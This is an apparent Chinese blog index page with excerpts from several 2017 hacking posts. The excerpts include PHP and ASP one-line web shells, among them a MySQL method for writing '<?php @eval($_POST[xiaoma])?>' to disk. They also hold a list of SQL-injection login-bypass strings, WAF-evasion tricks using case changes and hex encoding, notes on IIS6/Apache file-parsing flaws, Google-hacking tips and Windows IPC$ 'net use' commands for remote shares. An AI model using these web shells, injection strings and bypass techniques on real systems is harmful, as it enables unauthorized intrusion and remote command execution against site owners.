摘要: 方法一: CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL ); INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>'); SELE 阅读全文
posted @ 2017-01-21 10:33 夕颜z 阅读(350) 评论(0) 推荐(0) 编辑
摘要: 1.一句话说明 常用的一句话有冰狐浪子的一句话,蓝屏的,lack2的,当然还有海洋的。我们如果知道了一句话的原理。自己也可以很轻松的写一个。 <%execute(request("cmd"))%> <%execute request("1")%> ASP一句话16进制:┼攠數畣整爠煥敵瑳∨≡┩愾 密 阅读全文
posted @ 2017-01-21 10:31 夕颜z 阅读(1178) 评论(0) 推荐(0) 编辑
摘要: asp aspx万能密码 1:"or "a"="a 2: )or(a=a 3:or 1=1-- 5:aor 1=1-- 6:"or 1=1-- 7:ora=a 8:"or"="a=a 9:or= 10:or=or 11: 1 or 1=1=1 12: 1 or 1=1 or 1=1 13: OR 1 阅读全文
posted @ 2017-01-21 10:29 夕颜z 阅读(412) 评论(0) 推荐(0) 编辑
摘要: 1.大小写绕过 这个大家都很熟悉,对于一些太垃圾的WAF效果显著,比如拦截了union,那就使用Union UnIoN等等绕过。 2.简单编码绕过 比如WAF检测关键字,那么我们让他检测不到就可以了。比如检测union,那么我们就用%55也就是U的16进制编码来代替U,union写成 %55nION 阅读全文
posted @ 2017-01-21 10:26 夕颜z 阅读(550) 评论(0) 推荐(0) 编辑
摘要: 500是服务器内部错误,说明是有文件的 Apache 漏洞之后缀名解析漏洞 我们都知道windows2003 + IIS6.0下,如果目录结构中有xxx.asp这样的目录,那么所有这个目录下的文件不管扩展名为什么,都会当作asp来解析。我们一般称这个漏洞为 windows2003+iis6.0目录解 阅读全文
posted @ 2017-01-21 10:23 夕颜z 阅读(2735) 评论(0) 推荐(1) 编辑
摘要: http://www.milw0rm.com/ http://www.frsirt.com/ http://www.derkeiler.com/ http://www.securiteam.com/ http://www.securityfocus.com/ http://www.packetsto 阅读全文
posted @ 2017-01-21 10:21 夕颜z 阅读(917) 评论(1) 推荐(0) 编辑
摘要: 搜索也是一门艺术 在我们平时使用搜索引擎的过程中,通常是将需要搜索的关键字输入搜索引擎,然后就开始了漫长的信息提取过程。其实Google对于搜索的关键字提供了多种语法,合理使用这些语法,将使我们得到的搜索结果更加精确。当然,Google允许用户使用这些语法的目的是为了获得更加精确的结果,但是黑客却可 阅读全文
posted @ 2017-01-21 10:19 夕颜z 阅读(210) 评论(0) 推荐(0) 编辑
摘要: net use $">\\ip\ipc$Content$nbsp;" " /user:" " 建立IPC空链接 net use $">\\ip\ipc$Content$nbsp;"密码" /user:"用户名" 建立IPC非空链接 net use h: $">\\ip\c$Content$nbsp; 阅读全文
posted @ 2017-01-21 10:17 夕颜z 阅读(436) 评论(0) 推荐(0) 编辑
摘要: auscert.org.au 澳大利亚电脑紧急反应小组,包括大量入侵攻击及其工作原理的信息。 www.astalavista.com 一个很棒的黑客工具和入侵攻击的搜索网站 www.cert.org Carngie Mellon大学的计算机紧急反应小组的网站。 ftp.cert.dfn.de 软件下 阅读全文
posted @ 2017-01-21 10:15 夕颜z 阅读(1363) 评论(0) 推荐(0) 编辑